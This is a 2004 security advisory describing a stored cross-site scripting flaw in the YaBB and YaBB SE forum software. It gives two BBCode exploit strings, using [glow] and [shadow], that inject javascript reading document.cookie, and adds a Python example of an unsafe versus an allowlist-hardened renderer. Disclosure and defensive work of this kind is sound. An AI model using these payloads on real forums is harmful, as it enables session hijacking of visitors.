YaBB/YaBBse Cross Site Scripting Vulnerability

#####################################################################

 Advisory Name : YaBB/YaBBse Cross Site Scripting Vulnerability
  Release Date : Mar 14, 2004
   Application : YaBB/YaBBse
     Tested On : YaBB 1 Gold (SP1.3)
                 YaBB SE 1.5.1 Final
    Vendor URL : http://www.yabbforum.com/
                 http://www.yabbse.org/
      Discover : Cheng Peng Su (apple_soup_at_msn.com)

#####################################################################



  Proof of concept:

      The problem is in the [glow] and [shadow] tags: YaBB doesn't
   filter the characters in these tags. The attack doesn't need the
   visitor to click any links; the XSS code is executed as soon as
   the visitor reads the thread.

  

  Exploit:

   [glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]

   [shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]

   

  Contact:

   Cheng Peng Su
   Class 1,Senior 2,High school attached to Wuhan University
   Wuhan,Hubei,China(430072)
   apple_soup_at_msn.com
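
The following is an added example, not part of the original advisory and not code from YaBB or YaBB SE: a hypothetical Python BBCode renderer that shows how an unfiltered [glow]/[shadow] argument lands inside the style attribute, beside a hardened version that allowlists each argument. The output markup, the function names and the set of shadow directions are assumptions.

```python
import html
import re

# Hypothetical BBCode renderer written for this example; it is not YaBB's code.
TAG_RE = re.compile(r"\[(glow|shadow)=([^\]]*)\](.*?)\[/\1\]", re.S | re.I)
# Allowlists per argument. Anything that does not match is never emitted as CSS.
COLOR_RE = re.compile(r"[A-Za-z]{1,20}|#[0-9A-Fa-f]{3}|#[0-9A-Fa-f]{6}")
NUMBER_RE = re.compile(r"[0-9]{1,4}")
SECOND_ARG = {
    "glow": NUMBER_RE,                               # e.g. 2
    "shadow": re.compile(r"left|right|top|bottom"),  # assumed direction words
}


def render_unsafe(post):
    """'Before' form: the tag argument is pasted into the style attribute."""
    def repl(m):
        tag, arg, text = m.group(1).lower(), m.group(2), m.group(3)
        return f'<span style="filter:{tag}(color={arg})">{text}</span>'
    return TAG_RE.sub(repl, post)


def render_safe(post):
    """Hardened form: validate every argument, otherwise keep the tag as text."""
    def repl(m):
        tag, parts = m.group(1).lower(), m.group(2).split(",")
        valid = (
            len(parts) == 3
            and COLOR_RE.fullmatch(parts[0])
            and SECOND_ARG[tag].fullmatch(parts[1])
            and NUMBER_RE.fullmatch(parts[2])
        )
        if not valid:
            return html.escape(m.group(0))  # shown literally, no markup emitted
        color, second, width = parts
        return (f'<span style="filter:{tag}(color={color},{second});'
                f'width:{width}px">{html.escape(m.group(3))}</span>')
    return TAG_RE.sub(repl, post)


# The [glow] string from the Exploit section above, joined onto one line.
PAGE_GLOW = ("[glow=red);background:url(javascript:alert(document.cookie));"
             "filter:glow(color=red,2,300]Big Exploit[/glow]")

if __name__ == "__main__":
    print("unsafe:", render_unsafe(PAGE_GLOW))
    print("safe:  ", render_safe(PAGE_GLOW))
    print("benign:", render_safe("[shadow=red,left,300]Hello[/shadow]"))
```
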

   

      

 

   
